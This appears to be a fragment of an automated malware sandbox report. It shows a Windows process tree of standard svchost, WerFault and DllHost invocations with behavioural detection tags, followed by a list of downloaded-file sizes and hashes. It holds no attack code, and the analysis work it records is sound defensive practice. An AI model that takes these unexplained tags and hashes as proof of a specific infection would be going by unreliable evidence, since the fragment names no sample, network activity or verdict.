C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1876
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1552
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3900 -ip 39002⤵PID:4688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 43482⤵PID:1984
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 3452 -ip 34522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1356
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 412 -p 3344 -ip 33442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4440
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 2348 -ip 23482⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3736
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 4328 -ip 43282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5024
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1448
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2348
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2348 -s 4762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:100
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4328
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4328 -s 4842⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3572
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35KB
MD56ba946cb3b5bf38edfe7d409ade48a96
SHA1f32c78c4d55fe1430bc2fb07f8082e6367d3440a
SHA2564b0f473dba4f41ab11846e5cfc045b3af76d7f94ddcf775aef2a813f2be152a5
SHA5128eeb0c462eab18ebd9a36e09180e1f214c479f6515b6312148066c0b35689f9ec7e066cd373020f6276f01bac028008e41341c66ea6e5b84f33a5d99a0b6f6db
-
Filesize
13KB
MD5b780e661bacdc6caf81b7b13dbb88979
SHA1f314556b82844f19d8df04984d4de22f278335b9
SHA25694bd91b2658a846ae728de983f1abecb8bbbaa07efc31aa5fc291e0c01f6452b
SHA512b9f79de28a7b8221d9ef18a6c889063d05bb6df421ef2544f572b09c1ccf28f8cdeb3469a1c27e383fd608beeb7e5d28ea97c8bc812d03ca0d5d79db2a859bd5
-
Filesize
35KB
MD507faea265b934fc08a01376108efa5ff
SHA1cac1aaf9d4d12a92a0d2ad8bfc35734b27965011
SHA2561e48367811f32db0da44ad34c3ebf216e174de01082a7ca37019fb78ce678c3b
SHA512d5750c9333640025c2933422a110a7135e8b5073a22c98201e54611dadb600d2e8e824679f244f5d425f0696885f037264a223354debde232778f8028abaccce
-
Filesize
13KB
MD5eeffa2debd91283dc697f2e1a1910390
SHA139f85063e34ddd4791d03ca5a97313f8e41b5f95
SHA2566a4891b6b29d6543f276496975c1ae4814d6c6011cf71e826aa450674d35a4f6
SHA512472bfc671ad8903cf07cfbd0234900eb2106f312d5a5c00963dba115d48c9f1f106d763d05fdc8523e2f4547f1f412122fe545b8703f5b9aa2a9711248ed0eea
-
Filesize
38KB
MD51894dbef83f569e8330fa98d9f154e24
SHA127746d992a48c91ed43773cf4ad2b0d2ae334fe1
SHA256d97ea0c731c7e3b960f62c4adc4c5517b0c271b988b13d28da14dc0451e2ed5d
SHA512ac55e6a842ed69ec31d30a29d94e2b0bd56a8aff8eb6e800822e86188e892cd16e5ac9fff3256b01f4a0a33e922aae11ae54b342dce4e1638b384939264d0830
-
Filesize
38KB
MD51115ee1d46ca27e0f92f89539feecf1f
SHA1dda5f8ecb437cc53084ce6f3bd921c13c08f8d5e
SHA25651932aaf5c141f8425f1f173e3261ed126e2ed68a3d51312a951b4b3b5cead93
SHA5126fa23b193c61639a6f9bbd2b8cf158ca310c1bae5240eb0c62b782188592a510eeab9787e97593e9e877cff79c87123f2a47143ccdddf2e7035f8e6a3838f89e
-
Filesize
13KB
MD5f4757ca46656597c123fe91fef1c8d28
SHA122f04df1c5da08b4522a09ee44a0a123a1e00c72
SHA256cb1d7bb7c901028c9c8d483ad614912192c356a0f206b11062fb4c7b00609518
SHA51225dfb4806cba9b10f5fc46dc4b125477acf10ad7ed952b7d6afcce437ca60747a143071a2de3523ce5bd0f22d6e4414c1920c12c5e4b0c3d27f46f2910a4f27c
-
Filesize
13KB
MD5b32f423fcddd838b8a41ceafec8a9115
SHA17105a43b6d7eeaab21fd93fa2daf075393fa7676
SHA256236f9258c034bd80dc5ef6571018ad261ff1d8a0e4e44b2090aea81cdc4c97d2
SHA512e535ca0ea824b93c526c852afb4457e6fb4e99e8f4430ec76eba99a894d41cb4f71606cf5375c103b75c5ab12163dac019afa3564fb2aa8d5ba4845282080987
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
19KB
MD5cb2f0a508942eda5f5930590af1771a8
SHA1bdf1773f9cf85bad96852b519c23469c249d14c0
SHA25695b8d0f382dec1c9b0f5e99c3f568279287198de577ba95dbbaaa00710151db2
SHA512839a577a0e6d1686a83c85664faeddac7aecc6b9b00b4a34bcc2bfc226384e006ff08741fa4ff84e29e55a0e1496e400d19701df2f1c7c91f6ee68a685cae7cf
-
Filesize
948B
MD5a7ce8cefc3f798abe5abd683d0ef26dd
SHA1b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
SHA2565e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
SHA512c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64
-
Filesize
8KB
MD5bed2ccf5544f57481646a39355951bc2
SHA12793df54fc6c67d8fc76e5f299551398bed1ca81
SHA2561a87fba1c9ed624c634dc30a63e62b07c073c3634cc51137269ce0816e17d6f6
SHA51212474c8d4abb19b90587196c7365769cffff48e5c069a969b69a58210ba493de4e6218a85a93f731bc973c43b56611d9d2f546449b301432c81e77e8ed0ab8ef
-
Filesize
512KB
MD5947ae80fae66782d640746f4ee8c212b
SHA10c698989cc705fca522c0711dded96700cd8de8e
SHA2568aef87a8942ea5077659ec406cf93d8a073fd6d646cf6c68e25fd0a3bdac1400
SHA51255d08f3bbfd2c9882c266a852260f53b1bc5d6f6abfd1bc713f64059bc77c5f62ae96694e12fe8cde59e67a7876aa2918874c70cee37c7ccafdb9e9088689a63
-
Filesize
14.0MB
MD568cd6526560b400b8c1e3c4dbeb5e957
SHA1062e4345d13fe63e73574abd1d1cc06be92093b4
SHA256638b6cc16be7b923cc9b3d21197d9af629487634258dab08db69b97b279cb849
SHA5124d1d5ffbc20e626e40b9de02bc45811cccf19fbedb46e0099f5cfbe1d2b67b02a0a70097e11ab4eccba8e974efb3109039a6d8f3066efde91757a288bfeb5d27
-
Filesize
16KB
MD54b733410cd95f9990eed5d0df5fde18d
SHA152ac2cb8037e4846ba60fdb1f20883b56808bd31
SHA256cf473cf45c70862bddc2d92da375cd595d457cadfd725f199dceaa3377e3814d
SHA5124cdf766622194e11443d978e3b1bb780d2fa0036fc170e6c3bc258cded18603f41a3ab9ca3a6165535de867e4a4e645109c6a3f2442e45988000cf24fa72b1f8
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
1.4MB
MD5bb86a343080f9f4696c250ef31a18d9d
SHA143b2193dcb1d56eac73ba88a7b461822074192d6
SHA256095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
SHA51224807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
477KB
MD53753f9966e5b4fdc87184c1749f2bd25
SHA169b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
SHA2560f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
SHA5123283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
SHA512fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a